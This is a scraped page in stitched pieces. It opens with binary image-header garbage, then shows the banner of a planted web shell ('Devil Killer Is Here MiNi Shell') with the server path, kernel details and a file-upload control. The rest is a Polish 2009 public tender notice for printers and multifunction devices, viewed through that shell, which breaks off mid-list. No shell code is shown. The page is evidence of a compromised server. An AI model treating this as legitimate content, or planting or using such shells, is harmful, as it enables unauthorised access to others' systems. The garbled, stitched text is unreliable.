JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20091022/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20091022/185327-N-2009.html

<p class="kh_header"><b>Warszawa: Zakup urządzeń wielofunkcyjnych i drukarek wraz z materiałami eksploatacyjnymi.
Sprawa nr ZZP/37/2009</b><br>
<b>Numer ogłoszenia: 185327 - 2009; data zamieszczenia: 22.10.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Narodowy Fundusz Ochrony Środowiska i Gospodarki Wodnej , ul. Konstruktorska 3a, 02-673 Warszawa, woj. mazowieckie, tel. 022 4590000, faks 022 4590201.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.nfosigw.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup urządzeń wielofunkcyjnych i drukarek wraz z materiałami eksploatacyjnymi.
Sprawa nr ZZP/37/2009.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zakup urządzeń wielofunkcyjnych i drukarek wraz z materiałami eksploatacyjnymi. 
Szczegółowy opis przedmiotu zamówienia zawarty został w Części III SIWZ (odpowiednio dla 1 Części - w Części III-1 SIWZ, dla 2 Części  - w Części III-2 SIWZ, dla 3 Części  - w Części III-3 SIWZ, dla 4 Części  - w Części III-4 SIWZ,  dla 5 Części  - w Części III-5 SIWZ).
Opcje: Zamawiający przewiduje prawo opcji w zamówieniu polegające na możliwości zakupu, w terminie 18 miesięcy od daty podpisania umowy, dodatkowo: w Części 2 - 1 monochromatycznego wydajnego urządzenia wielofunkcyjnego, w Części 3 - 1 wydajnej drukarki, w Części 4 - 3 średnich urządzeń wielofunkcyjnych, w Części 5 - 5 małych urządzeń wielofunkcyjnych.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 30.12.11.00-4, 30.23.21.10-8, 30.12.51.10-5, 30.12.51.20-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 18.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> dotyczy każdej Części zamówienia tj.: Części 1, Części 2, Części 3, Części 4 
i Części 5.
1.Wykonawcy ubiegający się o niniejsze zamówienie publiczne muszą złożyć oświadczenie o spełnieniu warunków udziału w postępowaniu (zaleca się złożenie oświadczenia zgodnie z wzorem stanowiącym Załącznik nr 2 do Części I SIWZ, tj. Instrukcji dla Wykonawców, zwanej dalej IDW), spełniać niżej określone warunki udziału w postępowaniu oraz złożyć pozostałe wymagane poniżej dokumenty: 
1) posiadać uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień oraz nie podlegać wykluczeniu z postępowania na podstawie art. 24 ust. 1 i 2 ustawy Pzp. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, warunek dotyczący uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień oraz nie podleganiu wykluczeniu z postępowania na podstawie art. 24 ust. 1 i 2 ustawy Pzp, musi być spełniony przez każdego z tych Wykonawców.2) posiadać niezbędną wiedzę i doświadczenie oraz dysponować potencjałem technicznym i osobami zdolnymi do wykonania niniejszego zamówienia lub przedstawić pisemne zobowiązania innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia. 3) znajdować się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie niniejszego zamówienia. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, warunki określone w pkt. III.2)1.2) i w pkt. III.2)1.3) powyżej muszą oni spełniać łącznie.
Ocena spełniania przedstawionych powyżej warunków zostanie dokonana na podstawie przedłożonych dokumentów, wg formuły: spełnia - nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> dotyczy każdej Części zamówienia tj.: Części 1, Części 2, Części 3, Części 4 
i Części 5.
2. W celu potwierdzenia spełnienia  warunku określonego w pkt. III.1)1.1) powyżej, Wykonawcy zobowiązani są przedłożyć aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia dokument, o którym mowa powyżej, musi złożyć każdy z Wykonawców.Potwierdzenie spełniania przez Wykonawcę/ów warunków określonych w  pkt. III.2)1.2) i w pkt. III.2)1.3) nastąpi poprzez złożenie oświadczenia, o którym mowa w pkt. III.2)1. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia oświadczenie, o którym mowa  powyżej mogą oni złożyć łącznie, w przypadku łącznego spełniania warunków udziału w postępowaniu albo odrębnie, jeżeli Wykonawca składający odrębnie oświadczenie, spełnia samodzielnie wszystkie warunki udziału w postępowaniu.3. Stosownie do treści §2 Rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 r. (Dz. U. Nr 87, poz. 605 z późn. zm.) w sprawie rodzajów dokumentów, jakich może żądać Zamawiający od Wykonawcy, oraz form, w jakich te dokumenty mogą być składane, jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej zamiast dokumentów o których mowa: 
1)  w pkt III.2) 2. składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości.
2)  dokument/ty, o których mowa powyżej w ppkt 1) muszą być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
3) jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa powyżej w pkt 2.1), zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania. Oświadczenie takie nie może być wystawione wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
Wszystkie dokumenty, o których mowa powyżej w pkt. 2 i 3, Wykonawca składa w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę. Dokumenty sporządzone w języku obcym, muszą być złożone wraz z tłumaczeniem na język polski, poświadczonym przez Wykonawcę.W przypadku składania przez jednego Wykonawcę oferty na więcej niż jedną Część zamówienia, Zamawiający wymaga złożenia dokumentów potwierdzających spełnianie warunków udziału w postępowaniu oddzielnie dla każdej Części zamówienia (dokumenty należy załączyć do oferty składanej na daną Część zamówienia)..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.nfosigw.gov.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Narodowy Fundusz Ochrony Środowiska i Gospodarki Wodnej, 02-673 Warszawa, ul. Konstruktorska 1, pokój 214.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.11.2009 godzina 11:00, miejsce: Ofertę należy złożyć w siedzibie Zamawiającego przesyłając ją na adres: 
|ul. Konstruktorska 3a, 02-673 Warszawa lub osobiście w Kancelarii NFOŚiGW lub 
w pokoju nr 214 przy ul. Konstruktorskiej 1.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia mają obowiązek ustanowić Pełnomocnika do reprezentowania ich w niniejszym postępowaniu albo reprezentowania ich w postępowaniu i zawarcia umowy 
w sprawie zamówienia publicznego. Zaleca się, aby Pełnomocnikiem był jeden 
z Wykonawców wspólnie ubiegających się o udzielenie zamówienia. Pełnomocnictwo może być udzielone w szczególności:- łącznie przez wszystkich Wykonawców (jeden dokument),- oddzielnie przez każdego z nich (tyle dokumentów ilu Wykonawców). W każdym jednak przypadku w treści dokumentu/pełnomocnictwa zaleca się wymienić wszystkich Wykonawców wspólnie ubiegający się o udzielenie zamówienia i wskazać ich Pełnomocnika. Wszelką korespondencję Zamawiający będzie prowadził wyłącznie z Pełnomocnikiem. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, ponoszą solidarną odpowiedzialność za wykonanie umowy. 2. SIWZ można pobrać ze strony internetowej Zamawiającego podanej w sekcji I. 3. Termin związania ofertą (30 dni), zgodnie z art. 85 ust. 5 ustawy Pzp, zaczyna bieg wraz z upływem terminu składania ofert i liczony jest łącznie z tym dniem. 4. W niniejszym postępowaniu oświadczenia, wnioski, zawiadomienia oraz informacje Zamawiający i Wykonawcy przekazują faksem (+48 22 459 02 01). Zawsze dopuszczalna jest forma pisemna. Jeżeli Zamawiający lub Wykonawca przekazuje oświadczenia, wnioski, zawiadomienia oraz informacje faksem, każda ze stron na żądanie drugiej niezwłocznie potwierdza fakt ich otrzymania. W przypadku konieczności złożenia przez Wykonawcę wyjaśnień dotyczących treści oferty lub złożonych dokumentów - wyjaśnienia te mogą być składane faksem. W przypadku konieczności uzupełnienia złożonych przez Wykonawcę dokumentów - składane są one w formie oryginału lub kopii poświadczonych za zgodność z oryginałem przez Wykonawcę, z zastrzeżeniem pkt.12.2.10) IDW w zakresie dotyczącym formy Pełnomocnictwa. Osobą wyznaczoną do kontaktów 
z wykonawcami w niniejszym postępowaniu jest Elżbieta Adamaszek-Watts - tel. +48 22 45 90 615. 5.Oświadczenia i dokumenty składane przez Wykonawcę wraz z ofertą, dla których Zamawiający określił wzory w IDW, powinny zostać sporządzone z ich wykorzystaniem lub być z nimi zgodne - co do treści. 6. Postępowanie oznaczone jest numerem - ZZP/37/2009. 
7. W celu potwierdzenia, że oferowane urządzenia odpowiadają wymaganiom określonym przez Zamawiającego, do oferty należy dołączyć, odpowiednio dla urządzenia na które składana jest oferta, próbki (wydruki, kopie oraz płyta CD/DVD ze sterownikiem do oferowanego urządzenia i skanami). Przedłożone próbki będą służyły do dokonania oceny oferowanych urządzeń odpowiednio w kryteriach: funkcjonalność i ergonomia, jakość wydruków, skanów oraz kopii, przedstawionych w pkt 21 IDW.
 8. Przy ocenie ofert według przyjętych kryteriów zastosowane będą następujące podkryteria:  
dla Części 1 w kryterium funkcjonalność i ergonomia oceniane będą:
1) ergonomia obsługi i jakość sterownika do Urządzenia dostarczonego przez Wykonawcę na płycie CD/DVD (0-8 pkt) charakteryzującego się:
czytelnym opisem i rozmieszczeniem opcji drukowania (0-5 pkt),
brakiem konieczności oczekiwania przy zmianach opcji wydruku (czas pomiędzy zaznaczeniem jednej i kolejnej opcji, im krótszy tym oferta zostanie proporcjonalnie lepiej oceniona) (0-3 pkt),
2)możliwość skanowania do PenDrive i drukowania z PenDrive (Tak-4 pkt,  Nie-0 pkt);
3)skanowanie, przy użyciu panelu urządzenia, do email w formacie przeszukiwalnego PDF (Tak-4 pkt, Nie-0 pkt),
4)zszywacz min. 20 kartek o gramaturze 80 g/m2 (Tak-2 pkt, Nie-0 pkt),
5)serwer wydruku z interfejsem sieciowym Ethernet 1000 Mb/s (RJ-45) (Tak-2 pkt, Nie-0 pkt),
w kryterium jakość wydruków, skanów oraz kopii:
1)Ocena jakości wydruków (JW: 0-7 pkt), oceniana jako średnia ocen 5 próbek wydruków.
2)Ocena jakości skanów (JS: 0-4 pkt) oceniana na podstawie próbki skanu.
3)Ocena jakości kopii (JK: 0-4 pkt), oceniana na podstawie próbki kopii.

  dla Części 2 w kryterium funkcjonalność i ergonomia oceniane będą:
1) ergonomia obsługi i jakość sterownika dostarczonego przez Wykonawcę na płycie CD/DVD i zainstalowanego na komputerze (0-8 pkt) charakteryzującego się:
czytelnym opisem i rozmieszczeniem opcji drukowania (0-5 pkt),
brakiem konieczności oczekiwania przy zmianach opcji wydruku (czas pomiędzy zaznaczeniem jednej i kolejnej opcji, im krótszy tym oferta zostanie proporcjonalnie lepiej oceniona) (0-3 pkt),
2)możliwość skanowania do PenDrive i drukowania z PenDrive (Tak-4 pkt, Nie-0 pkt);
3)skanowanie, przy użyciu panelu urządzenia, do email w formacie  przeszukiwalnego PDF (Tak - 3 pkt, Nie-0 pkt),
4) serwer wydruku z interfejsem sieciowym Ethernet 1000 Mb/s (RJ-45) (Tak-2 pkt, Nie-0 pkt),
5) możliwość wysyłania faksów z komputera z potwierdzeniem wysłania (Tak-1 pkt, Nie-0 pkt). 
  w kryterium jakość wydruków, skanów oraz kopii:
1)Ocena jakości wydruków (JW: 0-4 pkt) oceniana jako średnia ocen 5 próbek wydruków.
2)Ocena jakości skanów (JS: 0-3 pkt) oceniana na podstawie próbki skanu.
3)Ocena jakości kopii (JK: 0-3 pkt) oceniana na podstawie próbki kopii.

  dla Części 3 w kryterium funkcjonalność i ergonomia oceniane będą:
1) ergonomia obsługi i jakość sterownika dostarczonego przez Wykonawcę na płycie CD/DVD i zainstalowanego na komputerze (0-8 pkt) charakteryzującego się:
czytelnym opisem i rozmieszczeniem opcji drukowania (0-5 pkt),
brakiem konieczności oczekiwania przy zmianach opcji wydruku (czas pomiędzy zaznaczeniem jednej i kolejnej opcji, im krótszy tym oferta zostanie proporcjonalnie lepiej oceniona) (0-3 pkt),
2)serwer wydruku z interfejsem sieciowym Ethernet 1000 (RJ-45) (Tak-2 pkt, Nie-0 pkt).

  dla Części 4 w kryterium funkcjonalność i ergonomia oceniane będą:
1) ergonomia obsługi i jakość sterownika dostarczonego przez Wykonawcę na płycie CD/DVD i zainstalowanego na komputerze (0-8 pkt) charakteryzującego się:
czytelnym opisem i rozmieszczeniem opcji drukowania (0-5 pkt),
brakiem konieczności oczekiwania przy zmianach opcji wydruku (czas pomiędzy zaznaczeniem jednej i kolejnej opcji, im krótszy tym oferta zostanie proporcjonalnie lepiej oceniona) (0-3 pkt),
2) możliwość skanowania do PenDrive i drukowania z PenDrive (Tak-4 pkt, Nie-0 pkt);
3) skanowanie wielu stron, zarówno z automatycznego podajnika jak i z lustra skanera, do jednego, wielostronicowego pliku PDF z panelu sterowania urządzenia (Tak-4 pkt, Nie-0 pkt),
4) skanowanie do formatu przeszukiwalnego PDF (Tak-2 pkt, Nie-0 pkt),
5) możliwość wysyłania faksów z komputera z potwierdzeniem wysłania (Tak-2 pkt, Nie-0 pkt),
   w kryterium jakość wydruków, skanów oraz kopii:
1)Ocena jakości wydruków (JW: 0-4 pkt) oceniana jako średnia ocen 5 próbek wydruków.
2)Ocena jakości skanów (JS: 0-3 pkt) oceniana na podstawie próbki skanu.
3)Ocena jakości kopii (JK: 0-3 pkt) oceniana na podstawie próbki kopii.

  dla Części 5 w kryterium funkcjonalność i ergonomia oceniane będą:
1) ergonomia obsługi i jakość sterownika dostarczonego przez Wykonawcę na płycie CD/DVD i zainstalowanego na komputerze (0-8 pkt) charakteryzującego się:
czytelnym opisem i rozmieszczeniem opcji drukowania (0-5 pkt),
brakiem konieczności oczekiwania przy zmianach opcji wydruku (czas pomiędzy zaznaczeniem jednej i kolejnej opcji, im krótszy tym oferta zostanie proporcjonalnie lepiej oceniona) (0-3 pkt),
2) skanowanie wielu stron, zarówno z automatycznego podajnika jak i z lustra skanera, do jednego, wielostronicowego pliku PDF z panelu sterowania urządzenia (Tak-4 pkt, Nie-0 pkt),
3) możliwość skanowania do PenDrive i drukowania z PenDrive (Tak-4 pkt, Nie-0 pkt),
4) skanowanie do formatu przeszukiwalnego PDF (Tak-2 pkt, Nie-0 pkt),
5) możliwość wysyłania faksów z komputera z potwierdzeniem wysłania (Tak-2 pkt, Nie-0 pkt),
w kryterium jakość wydruków, skanów oraz kopii:
1) Ocena jakości wydruków (JW: 0-4 pkt) oceniana jako średnia ocen 3 próbek wydruków.
2) Ocena jakości skanów (JS: 0-3 pkt) oceniana na podstawie próbki skanu.
3) Ocena jakości kopii (JK: 0-3 pkt) oceniana na podstawie próbki kopii.
 
9. Zamawiający wymaga, aby zamówienie było wykonywane w terminach, tj. aby Wykonawca:

a) w ramach zamówienia podstawowego dostarczył Urządzenia (w tym pierwszą partię materiałów i części eksploatacyjnych, zgodnie z Załącznikiem nr 3 do umowy), w terminie:
- 21 dni od daty zawarcia umowy (dotyczy Części 1, 2, 3 i 4),
- 21 dni od daty złożenia zamówienia (dotyczy Części 5). Zamówienie zostanie złożone nie później niż 12 tygodni od daty zawarcia umowy.
Materiały i części eksploatacyjne, będą dostarczane partiami (w ciągu 18 miesięcy od podpisania umowy). Pierwsza partia materiałów i części eksploatacyjnych zostanie dostarczona wraz z Urządzeniami, do których są przeznaczone, a kolejne partie materiałów i części eksploatacyjnych będą dostarczane, zgodnie z zamówieniami składanymi przez Kupującego, w ciągu 7 dni od daty złożenia zamówienia.
b) w ramach prawa opcji, przez okres 18 miesięcy od dnia zawarcia Umowy, dostarczał na zamówienie Zamawiającego Urządzenia (w tym pierwszą partię materiałów i części eksploatacyjnych) w ciągu 21 dni od daty złożenia zamówienia. Dostawa materiałów i części eksploatacyjnych, będzie realizowana partiami. Dostarczenie danej partii materiałów i części eksploatacyjnych nastąpi w ciągu 7 dni od daty złożenia zamówienia. 10.Zamawiający wymaga wniesienia, przed zawarciem umowy, zabezpieczenia należytego wykonania umowy w wysokości 5 procent  ceny całkowitej podanej w ofercie (odpowiednio w każdej Części  zamówienia).</p><p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Kolorowe wydajne urządzenie wielofunkcyjne (format A3).</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zakup kolorowego wydajnego urządzenia wielofunkcyjnego wraz z materiałami  i częściami eksploatacyjnymi. Szczegółowy  opis przedmiotu zamówienia zawarty został w Części III-1 SIWZ.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.12.11.00-4, 30.12.51.20-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 18.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 55</li>
<li>2. Funkcjonalność i ergonomia - 20</li>
<li>3. Jakość wydruków, skanów oraz kopii - 15</li>
<li>4. Okres gwarancji - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Monochromatyczne wydajne urządzenia wielofunkcyjne(format A3).</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zakup 3 monochromatycznych  wydajnych urządzeń wielofunkcyjnych wraz z materiałami  i częściami eksploatacyjnymi w tym 1 urządzenie w ramach prawa opcji. Szczegółowy opis przedmiotu zamówienia zawarty został w Części III-2 SIWZ.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.12.11.00-4, 30.12.51.20-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 18.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Funkcjonalność i ergonomia - 18</li>
<li>3. Okres gwarancji - 12</li>
<li>4. Jakość wydruków, skanów oraz kopii - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Wydajne drukarki (format A3).</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zakup 5 wydajnych drukarek wraz z materiałami  i częściami eksploatacyjnymi w tym 1 drukarkę w ramach prawa opcji.  Szczegółowy opis przedmiotu zamówienia zawarty został w Części III-3 SIWZ.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.23.21.10-8, 30.12.51.10-5.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 18.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 65</li>
<li>2. Okres gwarancji - 15</li>
<li>3. Funkcjonalność i ergonomia - 10</li>
<li>4. Jakość wydruków - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Średnie urządzenia wielofunkcyjne  (format A3).</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zakup 10 średnich  urządzeń wielofunkcyjnych  wraz z materiałami i częściami eksploatacyjnymi, w tym 3 urządzenia w ramach prawa opcji. Szczegółowy opis przedmiotu zamówienia zawarty został w Części III-4 SIWZ.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.12.11.00-4, 30.12.51.20-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 18.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Funkcjonalność i ergonomia - 20</li>
<li>3. Jakość wydruków, skanów oraz kopii - 10</li>
<li>4. Okres gwarancji - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Małe urządzenia wielofunkcyjne (format A4).</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zakup 25 małych urządzeń wielofunkcyjnych wraz z materiałami i częściami eksploatacyjnymi, w tym 5 urządzeń w ramach opcji. Szczegółowy opis przedmiotu zamówienia zawarty został w Części III-5 SIWZ.</li>
